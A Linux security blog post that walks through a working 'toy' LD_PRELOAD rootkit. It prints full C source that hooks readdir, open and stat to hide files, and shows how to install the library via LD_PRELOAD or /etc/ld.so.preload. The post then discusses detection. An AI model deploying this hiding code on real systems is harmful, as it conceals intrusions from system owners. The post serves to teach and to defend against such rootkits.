An LD_PRELOAD Toy Rootkit

If you are not interested in malware development for Linux, or have not read some of my previous blog posts, this blog post may be too technical for you. In that case, you may prefer to start with one of the earlier posts.

In this blog post, I want to present a toy LD_PRELOAD rootkit. It works by hijacking the dynamic linker and thus hiding itself from the system. Later, we will talk about how to detect it.

Preliminaries

Usually, when an ELF file is executed, first the dynamic linker resolves the functions imported from other libraries. When a function such as open() is encountered by the linker and not defined in the binary itself, the linker searches for it in various places. The order of these places is documented in the man page of ld.so and is not that important in this exposition.

The first definition that the dynamic linker finds is used, and it does not search any further. In particular, if a function is defined in several places, the one that comes first in the search order wins.
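To make the first-match rule concrete, here is a minimal sketch that asks the dynamic linker which object currently provides a symbol. It uses dlsym() and dladdr() from glibc; the helper name providing_object is my own choice for this illustration and is not part of toykit.

```c
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stddef.h>

/* Returns the path of the object that provides `symbol` in the current
 * process, or NULL if the symbol cannot be resolved.
 * (Hypothetical helper, for illustration only.) */
const char *providing_object(const char *symbol) {
    /* RTLD_DEFAULT follows the default search order: first match wins. */
    void *addr = dlsym(RTLD_DEFAULT, symbol);
    if (addr == NULL)
        return NULL;

    /* dladdr() maps an address back to the object that contains it. */
    Dl_info info;
    if (dladdr(addr, &info) == 0 || info.dli_fname == NULL)
        return NULL;
    return info.dli_fname;
}
```

In an unaffected process, I would expect providing_object("open") to name the C library, and to name a preloaded library instead if that library defines open(). On older glibc versions this needs -ldl when linking.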

The idea of an LD_PRELOAD rootkit is that a malicious library – the rootkit – is placed before the legitimate libraries in the search order of the dynamic linker. This can be achieved, e.g., by setting the environment variable with the command export LD_PRELOAD=<full path to rootkit>, or, system-wide, by adding the rootkit to /etc/ld.so.preload.

Then, legitimate function calls are hijacked by the rootkit. The rootkit can use these to hide its presence. Let me show you an example.

[user toykit]$ ls
README.md  toykit.c  toykit.so
[user toykit]$ gcc toykit.c -o toykit.so -fPIC -shared -ldl -D_GNU_SOURCE
[user toykit]$ export LD_PRELOAD=$(pwd)/toykit.so
[user toykit]$ ls
README.md
[user toykit]$ 
[user toykit]$ less toykit.c 
toykit.c: No such file or directory
[user toykit]$ cat toykit.c 
cat: toykit.c: No such file or directory

Here, the rootkit, called toykit, still exists in the directory but cannot be seen. Toykit hooks several glibc functions that are invoked by ls, less and cat. For directory listings, it calls the original readdir() and skips every entry whose name contains its own name. For open() and stat(), it does not call the original function for matching paths at all, but reports that the file does not exist.

In our implementation, the files can still be seen by the shell completion, but only because I apparently forgot to hook some more functions.

When executing ls with more debugging output, we can see the search order of the dynamic linker and that our rootkit is placed first. In the output below, the dynamic linker searches for the symbol _res, which is not implemented in toykit and hence the search continues at the other locations.

[user toykit]$ LD_DEBUG=symbols ls 2>&1 | head
symbol=__vdso_clock_gettime;  lookup in file=linux-vdso.so.1 [0]
symbol=__vdso_gettimeofday;  lookup in file=linux-vdso.so.1 [0]
symbol=__vdso_time;  lookup in file=linux-vdso.so.1 [0]
symbol=__vdso_getcpu;  lookup in file=linux-vdso.so.1 [0]
symbol=__vdso_clock_getres;  lookup in file=linux-vdso.so.1 [0]
symbol=_res;  lookup in file=ls [0]
symbol=_res;  lookup in file=/home/user/toykit/toykit.so [0]  <--- My rootkit is first in the library search order
symbol=_res;  lookup in file=/lib64/libselinux.so.1 [0]
symbol=_res;  lookup in file=/lib64/libcap.so.2 [0]
symbol=_res;  lookup in file=/lib64/libc.so.6 [0]

Source Code

Here is the commented source code of toykit. A real rootkit could also contain malicious functionality, such as hiding network sockets, malicious users, etc.

// gcc toykit.c -o toykit.so -fPIC -shared -ldl -D_GNU_SOURCE (-DDEBUG)

#include <stdio.h>
#include <dlfcn.h>
#include <string.h>
#include <dirent.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/stat.h>

 
#define HIDE_MAGIC "toykit"

// First and foremost, we remove the LD_PRELOAD to hide the presence
// of toykit. This removes it from env, but not from
// /proc/self/environ
static __attribute__((constructor)) void begin() {
    unsetenv("LD_PRELOAD");
}

// We hook readdir and skip entries whose name contains HIDE_MAGIC
struct dirent *readdir(DIR *dirp) {
    struct dirent *(*orig_readdir)(DIR *dirp);
    orig_readdir = dlsym(RTLD_NEXT, "readdir");
    #ifdef DEBUG
    puts("readdir hooked");
    #endif

    struct dirent *dir;
    while ((dir = orig_readdir(dirp)) != NULL) {
        // Stop at the first entry that does not contain HIDE_MAGIC
        if (strstr(dir->d_name, HIDE_MAGIC) == NULL) break;
    }
    return dir;
}

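// We hook open and hide files whose path contains HIDE_MAGIC.
// Note: the real open() is variadic; mode is only meaningful when
// flags contain O_CREAT or O_TMPFILE.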
int open(const char *pathname, int flags, mode_t mode) {
    int (*orig_open)(const char *pathname, int flags, mode_t mode);
    orig_open = dlsym(RTLD_NEXT, "open");
    #ifdef DEBUG
    printf("open hooked %s.\n", pathname);
    #endif

    if(strstr(pathname,HIDE_MAGIC) != NULL) {
      errno = ENOENT;
      return -1;
    }
    return orig_open(pathname, flags, mode);
}

int open64(const char *pathname, int flags, mode_t mode) {
    int (*orig_open64)(const char *pathname, int flags, mode_t mode);
    orig_open64 = dlsym(RTLD_NEXT, "open64");
    #ifdef DEBUG
    printf("open64 hooked %s.\n", pathname);
    #endif

    if(strstr(pathname,HIDE_MAGIC) != NULL) {
      errno = ENOENT;
      return -1;
    }
    return orig_open64(pathname, flags, mode);
}

// We hook stat and hide files whose path contains HIDE_MAGIC.
// This is used, e.g., by less
int stat(const char *pathname, struct stat *statbuf) {
    int (*orig_stat)(const char *pathname, struct stat *statbuf);
    orig_stat = dlsym(RTLD_NEXT, "stat");
    #ifdef DEBUG
    printf("stat hooked %s.\n", pathname);
    #endif

    if(strstr(pathname,HIDE_MAGIC) != NULL) {
      errno = ENOENT;
      return -1;
    }
    return orig_stat(pathname, statbuf);
}

int stat64(const char *pathname, struct stat64 *statbuf) {
    int (*orig_stat64)(const char *pathname, struct stat64 *statbuf);
    orig_stat64 = dlsym(RTLD_NEXT, "stat64");
    #ifdef DEBUG
    printf("stat64 hooked %s.\n", pathname);
    #endif

    if(strstr(pathname,HIDE_MAGIC) != NULL) {
      errno = ENOENT;
      return -1;
    }
    return orig_stat64(pathname, statbuf);
}

Detection

Detecting this approach is fairly simple, but let us first discuss approaches that will not work.

As shown above, we could check the library search order of the dynamic linker for changes, e.g., look for suspicious entries in /etc/ld.so.preload or /etc/ld.so.conf. This works against our toy rootkit. Against a more capable rootkit, however, such investigations may not yield results, because the tools used for them call the hooked functions themselves. As an example, the toy rootkit already removes the variable LD_PRELOAD that would indicate its presence. We could have taken this even further.
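As noted in the source code, unsetenv() does not change /proc/self/environ. The following minimal sketch checks such a NUL-separated environment file for an LD_PRELOAD entry. The function name environ_has_preload is my own invention, and the check runs through libc itself, so a more capable rootkit could hide the entry from it just as well.

```c
#include <stdio.h>
#include <string.h>

/* Returns 1 if the NUL-separated environment file at `path` contains an
 * entry starting with "LD_PRELOAD=", 0 if it does not, and -1 if the file
 * cannot be opened. (Hypothetical helper, for illustration only.) */
int environ_has_preload(const char *path) {
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return -1;

    static const char key[] = "LD_PRELOAD=";
    const size_t keylen = sizeof(key) - 1;
    size_t matched = 0;  /* characters of key matched in this entry */
    int at_start = 1;    /* still matching from the start of an entry? */
    int found = 0;
    int c;

    while ((c = fgetc(f)) != EOF) {
        if (c == '\0') {           /* entry separator: start over */
            at_start = 1;
            matched = 0;
            continue;
        }
        if (at_start && c == key[matched]) {
            if (++matched == keylen) {
                found = 1;
                break;
            }
        } else {
            at_start = 0;          /* mismatch: skip rest of this entry */
        }
    }
    fclose(f);
    return found;
}
```

A call such as environ_has_preload("/proc/self/environ") inspects the calling process; passing the environ file of another process works the same way, permissions allowing.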

What will work is comparing the content of the disk (obtained using dd) with what the file system of the running machine shows. If there are files on the disk that are not shown in the file system, then maybe an LD_PRELOAD rootkit is hiding them. Note that this comparison should not be done on the infected machine itself.

A second approach is to use statically linked binaries. When a statically linked binary is executed, no dynamic linker is involved, so there is nothing for the rootkit to hook. The most common choice is probably a statically linked busybox. Its built-in shell commands cannot be hijacked by the rootkit and can therefore be used for such a forensic analysis.
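If busybox is not at hand, a small self-written checker can serve the same purpose. The sketch below counts the directory entries whose name contains a given string. It only helps under the assumption that it is built with gcc -static on a clean machine, so that readdir() is fixed at link time. The function name count_matching_entries is hypothetical.

```c
#include <dirent.h>
#include <string.h>

/* Counts the entries in `dirpath` whose name contains `needle`.
 * Returns -1 if the directory cannot be opened.
 * (Hypothetical helper; meant to be linked statically.) */
int count_matching_entries(const char *dirpath, const char *needle) {
    DIR *dir = opendir(dirpath);
    if (dir == NULL)
        return -1;

    int count = 0;
    struct dirent *entry;
    while ((entry = readdir(dir)) != NULL) {
        if (strstr(entry->d_name, needle) != NULL)
            count++;
    }
    closedir(dir);
    return count;
}
```

Called from a small main() as count_matching_entries(".", "toykit"), a non-zero result in a directory where ls shows nothing suspicious would hint that something is hiding files there.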


Published

13 April 2025
